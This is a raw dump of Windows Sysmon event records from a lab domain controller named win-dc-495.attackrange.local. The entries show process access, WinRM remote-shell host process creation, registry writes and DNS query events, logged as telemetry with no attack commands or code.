13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E46-6005-1400-00000000A301}13042548C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7A00-00000000A301}3848C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x80000000000000002688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.751{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 10341000x80000000000000002687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.753{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-8E6A-6005-A5C5-050000000000}0x5c5a50HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 13241300x80000000000000002685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.751{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000002684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1484SetValue2021-01-18 13:34:38.735{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\MaxNoGPOListChangesIntervalDWORD (0x000003c0) 10341000x80000000000000002683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.735{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7A00-00000000A301}3848C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000002682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.605{59A5CD1D-8E46-6005-1400-00000000A301}1304eu-central-1.compute.internal9501-C:\Windows\System32\svchost.exe 22542200x80000000000000002681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.604{59A5CD1D-8E44-6005-0B00-00000000A301}856win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.604{59A5CD1D-8E44-6005-0B00-00000000A301}856_kpasswd._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.602{59A5CD1D-8E44-6005-0B00-00000000A301}856_kerberos._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.600{59A5CD1D-8E44-6005-0B00-00000000A301}856_gc._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.598{59A5CD1D-8E44-6005-0B00-00000000A301}856_gc._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.596{59A5CD1D-8E44-6005-0B00-00000000A301}856_kerberos._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-1000-00000000A301}1164win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.594{59A5CD1D-8E44-6005-0B00-00000000A301}856_kerberos._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.592{59A5CD1D-8E44-6005-0B00-00000000A301}856_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.590{59A5CD1D-8E44-6005-0B00-00000000A301}856_kerberos._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.588{59A5CD1D-8E44-6005-0B00-00000000A301}856gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.586{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.584{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.582{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.581{59A5CD1D-8E56-6005-3200-00000000A301}2692win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\dfssvc.exe 22542200x80000000000000002666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.580{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.579{59A5CD1D-8E44-6005-0B00-00000000A301}856_msdcs.attackrange.local.0type: 2 win-dc-495.attackrange.local;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.577{59A5CD1D-8E56-6005-2E00-00000000A301}2464f.f.f.f.6.d.4.8.b.4.f.b.0.e.8.f.0.0.0.0.0.0.0.0.e.0.1.0.0.0.a.0.ip6.arpa.9003-C:\Windows\sysmon64.exe 22542200x80000000000000002663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.577{59A5CD1D-8E44-6005-0B00-00000000A301}856_msdcs.attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.577{59A5CD1D-8E44-6005-0B00-00000000A301}8564d61ee54-4dac-4381-ba8d-516785205186._msdcs.attackrange.local.0type: 5 win-dc-495.attackrange.local;C:\Windows\System32\lsass.exe 22542200x80000000000000002661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.574{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.3db16a08-b25d-4da7-a946-d38d0aa25ce6.domains._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.572{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.pdc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.571{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.569{59A5CD1D-8E46-6005-1400-00000000A301}1304win10.ipv6.microsoft.com.0type: 5 onpremwindows.ipv6.microsoft.com.akadns.net;type: 5 trdovmssukwest.ipv6.microsoft.com.akadns.net;40.81.120.44;C:\Windows\System32\svchost.exe 22542200x80000000000000002657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.569{59A5CD1D-8E46-6005-1600-00000000A301}1544win10.ipv6.microsoft.com.0type: 5 onpremwindows.ipv6.microsoft.com.akadns.net;type: 5 trdovmssukwest.ipv6.microsoft.com.akadns.net;40.81.120.44;C:\Windows\System32\svchost.exe 22542200x80000000000000002656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.569{59A5CD1D-8E56-6005-2E00-00000000A301}2464crl4.digicert.com0type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Windows\sysmon64.exe 22542200x80000000000000002655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.569{59A5CD1D-8E46-6005-1100-00000000A301}1172time.windows.com0type: 5 time.microsoft.akadns.net;::ffff:51.105.208.173;C:\Windows\System32\svchost.exe 22542200x80000000000000002654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.569{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.568{59A5CD1D-8E56-6005-2900-00000000A301}2768attackrange.local0type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.567{59A5CD1D-8E56-6005-2E00-00000000A301}2464b.8.8.4.5.3.4.7.1.0.8.5.4.2.c.7.3.8.5.3.b.e.0.0.c.f.0.0.0.0.0.e.ip6.arpa.9502-C:\Windows\sysmon64.exe 22542200x80000000000000002651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.567{59A5CD1D-8E56-6005-2900-00000000A301}2768attackrange.local0type: 2 win-dc-495.attackrange.local;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.567{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.567{59A5CD1D-8E44-6005-0B00-00000000A301}856_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9502-C:\Windows\System32\lsass.exe 22542200x80000000000000002648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.566{59A5CD1D-8E46-6005-1000-00000000A301}1164attackrange.local0::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.566{59A5CD1D-8E56-6005-2900-00000000A301}2768win-dc-495.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.566{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.566{59A5CD1D-8E44-6005-0B00-00000000A301}856attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.566{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.9502-C:\Windows\System32\lsass.exe 22542200x80000000000000002643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.565{59A5CD1D-8E46-6005-1400-00000000A301}1304_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.9502-C:\Windows\System32\svchost.exe 22542200x80000000000000002642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.150{59A5CD1D-8E56-6005-2900-00000000A301}2768win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.149{59A5CD1D-8E44-6005-0B00-00000000A301}856WIN-DC-4950fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.148{59A5CD1D-8E56-6005-2900-00000000A301}2768localhost0::1;::ffff:127.0.0.1;C:\Windows\System32\dns.exe 22542200x80000000000000002639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.064{59A5CD1D-8E56-6005-2E00-00000000A301}2464crl3.digicert.com1460-C:\Windows\sysmon64.exe 734700x80000000000000002638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.720{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000002637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.720{59A5CD1D-8E6E-6005-7B00-00000000A301}31684116C:\Windows\system32\conhost.exe{59A5CD1D-8E6E-6005-7A00-00000000A301}3848C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E6E-6005-7B00-00000000A301}3168C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 